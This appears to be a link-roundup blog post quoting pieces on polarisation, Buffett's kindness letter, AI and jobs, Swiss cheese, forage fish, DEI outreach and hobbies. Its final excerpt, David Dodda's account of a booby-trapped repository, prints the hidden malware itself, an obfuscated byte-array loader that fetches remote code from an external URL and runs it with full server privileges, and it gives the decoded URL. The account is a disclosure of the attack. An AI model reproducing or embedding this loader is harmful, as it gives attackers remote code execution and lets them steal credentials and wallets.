Category: Food for thought

Joan Westenberg talking about why, in this policatical charged climate, it pays to pick a side.

When you pick a side and commit to it wholly and without reservation, you get things that moderate positions cannot provide. You get certainty in an uncertain world. You get a community that will defend you. You get a simple heuristic for navigating complex issues.

Above all: you get engagement, attention and influence.

The writer who says “this issue has nuance and I can see valid concerns on multiple sides” gets a pat on the head and zero retweets. The influencer who says “everyone who disagrees with me on this is either evil or stupid” gets quote-tweeted into visibility and gains followers who appreciate their approximation of clarity.

The returns on reasonableness have almost entirely collapsed.

But then we become prisoners of our own making. How to avoid it? Joan Westenberg suggest three simple things.

1. Diversifying your information sources.
2. Distinguish truth from noise.
3. Join communities that reward humility, not loyalty.

Warren Buffett’s final shareholder letter emphasising the importance of kindness.

One perhaps self-serving observation. I’m happy to say I feel better about the second half of my life than the first. My advice: Don’t beat yourself up over past mistakes – learn at least a little from them and move on. It is never too late to improve. Get the right heroes and copy them. You can start with Tom Murphy; he was the best.

Remember Alfred Nobel, later of Nobel Prize fame, who – reportedly – read his own obituary that was mistakenly printed when his brother died and a newspaper got mixed up. He was horrified at what he read and realized he should change his behavior.

Don’t count on a newsroom mix-up: Decide what you would like your obituary to say and live the life to deserve it.

Greatness does not come about through accumulating great amounts of money, great amounts of publicity or great power in government. When you help someone in any of thousands of ways, you help the world. Kindness is costless but also priceless. Whether you are religious or not, it’s hard to beat The Golden Rule as a guide to behavior.

I write this as one who has been thoughtless countless times and made many mistakes but also became very lucky in learning from some wonderful friends how to behave better (still a long way from perfect, however). Keep in mind that the cleaning lady is as much a human being as the Chairman.

This thought provoking article from Ahmed on the current state of AI’s onslaught on the job market.

This is where I keep coming back to a phrase that has been rattling around my brain for the past month: out of distribution humans.

Most work lives in the fat middle of a bell curve. Tasks repeat with small variations. Most graduate schemes are built around that fact. You take reasonably bright people, give them a handbook and a mentor, and let them climb a well mapped gradient. Shared service centres, call centres, warehouses, junior consulting rotations, entry level software roles, even a lot of legal and accounting work, all sit in that comfortable hunk of the curve where yesterday’s data is a very good guide to tomorrow’s tasks.

Models feast on that part of the curve. That is what they are trained on: logs, emails, historical cases, recordings of someone else doing the job, code repositories, scanned documents. If your work looks a lot like a large pile of past episodes, it is a short hop from playing them back to imitating them. The central question for future labour markets is not whether you are clever or diligent in some absolute sense. It is whether what you do is ordinary enough for a model to learn or strange enough to fall through the gaps.

An out of distribution human, in my head, is someone whose job sits far enough in the tail of that curve that it does not currently compress into training data. Maybe they work with genuinely novel problems. Maybe they operate at small scales or in messy physical situations where we do not yet have enough sensors. Maybe they have taste that is not easily reduced to click logs. They are not safe; nothing is. They are simply late on the automation curve. The system needs them until it can watch them for long enough and in enough detail that it can flatten what they do into data.

This reminds me of Zara Zhang’s observation.

Swiss cheese always had holes in it. The holes from which Jerry would emerge. But some time back Swiss cheese started losing holes. This video by Tim Scott explains why and how they managed to get it back.

The bacteria that are responsible for making these holes produce propionate, acetate and carbon dioxide, and this carbon dioxide is produced in the cheese and aggregates all around impurities. The more the bacterium produces this carbon dioxide, it accumulates and builds these holes. These impurities capture the carbon dioxide, and then a bubble forms and grows.

They found that the milk was too clean, so we didn’t have any dust in it, and this was because we had closed milking systems, so the dust could not get into the milk. Everything improved the last decade, so the milking process is hermetically closed now. And then, in former times, in the barn, you had always this hay dust everywhere, and it came also into the milk. We tried different particles to put into the milk to see if the holes are growing again. Hay powder is the best one, and we really could see that the whole formation was dependent on the concentration of the hay powder.

Somehow this reminds me of a dialogue from Tron: Legacy.

The thing about perfection is that it is unknowable, it’s impossible, but its also right in front of us, all the time

John Steele highlighting the irony of how farming sea food strips the sea itself.

In the cold waters of the Pacific, the anchoveta once shimmered in swarms so vast that sailors described them as turning the sea into a river of quicksilver. They were small, unassuming fish, yet the abundance of the ocean rested upon their delicate bones. Seabirds wheeled overhead in their millions, sea lions and whales dove into their depths, and predatory fish rose through the blue to feed on them. In those shoals lived the vitality of the sea itself. But in our age, the anchoveta, along with sardines and menhaden, have been transformed from living threads in an ancient web into bags of meal and casks of oil. Ninety percent of the forage fish caught by human hands are not eaten by us but ground down to feed salmon being raised in the cold fjords of Norway and shrimp and fish in the tropical ponds of Southeast Asia.

It is one of the great ironies of our time. To farm the sea, we strip the sea. We take from the ocean’s foundation to build its surface anew, and in the process we imperil both.

But all is not lost. There are some innovative solutions in the horizon.

This comment by th explains how DEI is essentially an outreach program. This is on the news of Python Software Foundations’ decision to withdraw from $1.5 million proposal for US government grant program.

It seems like a number of the “DEI is anti-merit discrimination” messages in this thread are overlooking how DEI work usually works.

A relevant tweet from 2016 (https://x.com/jessicamckellar/status/737299461563502595):

> Hello from your @PyCon Diversity Chair. % PyCon talks by women: (2011: 1%), (2012: 7%), (2013: 15%), (2014/15: 33%), (2016: 40%). #pycon2016

Increased diversity in communities usually comes from active outreach work. PyCon’s talk selection process starts blinded.

If 300 people submit talks and 294 are men, then 98% of talks will likely be from men.

If 500 people submit talks and 394 are men, then ~79% will likely be by men.

Outreach to encourage folks to apply/join/run/etc. can make a big difference in the makeup of applicants and the makeup of the end results. Bucking the trend even during just one year can start a snowball effect that moves the needle further in future years.

The world doesn’t run on merit. Who you know, whether you’ve been invited in to the club, and whether you feel you belong all affect where you end up. So unusually homogenous communities (which feel hard for outsiders to break into) can arise even without deliberate discrimination.

Organizations like the PSF could choose to say “let’s avoid outreach work and simply accept the status quo forever”, but I would much rather see the Python community become more diverse and welcoming over time.

François Chollet explaining the concept of understanding.

To really understand a concept, you have to “invent” it yourself in some capacity. Understanding doesn’t come from passive content consumption. It is always self-built. It is an active, high-agency, self-directed process of creating and debugging your own mental models.

Steve Blank explaining how science works. He then shares this simple table explaining the difference between theorists and experimentalists.

Mylar Melodies explaining why we should not be attaching external validations to our hobbies.

There’s a really good book called Four Thousand Weeks by Oliver Burkeman, a book that I’ve read three times now and if you’re over 40 I cannot recommend enough. It’s basically about the sort of mortality midlife crisis that you have when you enter your 40s. About am I doing enough? Am I going to get it all done? I’m going to die someday is when you start realizing because you’re like I’m halfway through. So you panic about am I doing enough. Have I done it all? Am I getting it all done? 

Basically the short answer of the book is, you will not get it all done and one of the things that it expounds is the notion of having a hobby and having a hobby that isn’t something that you’re good at. In fact, it goes so far as to say that actually not being good at the hobby is half of what makes the hobby good because you’re just doing it for its own intrinsic rewards. You’re not doing it as a side hustle. You’re not doing it for points. You’re not doing it as a thing you’re going to grow into this business, because by attaching all of this sort of stuff to it, all these obligations, these sort of like expectations, you turn something that is supposed to just be intrinsic. 

Something that’s just a thing you love and do because you’re alive and you get to enjoy doing things you love while you’re alive. It turns it into something that has like expectations attached to it and that colours it because you’re then thinking well I should only be doing something that’s going to like make my life better or like you know improve you know that I’m building towards it’s going to be a hustle it’s going to earn me money someday. Don’t worry it’s not a waste of time. I’m not wasting my time. But you’re not wasting your time because the point of life is just to enjoy yourself and to live a fulfilling life in whatever form that takes it’s different for everyone. But what I’m saying is it’s really important to have things that you just enjoy doing intrinsically.

David Dodda talking about his recent escape from being hacked by an ingenious method.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

“Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

AI saved the day.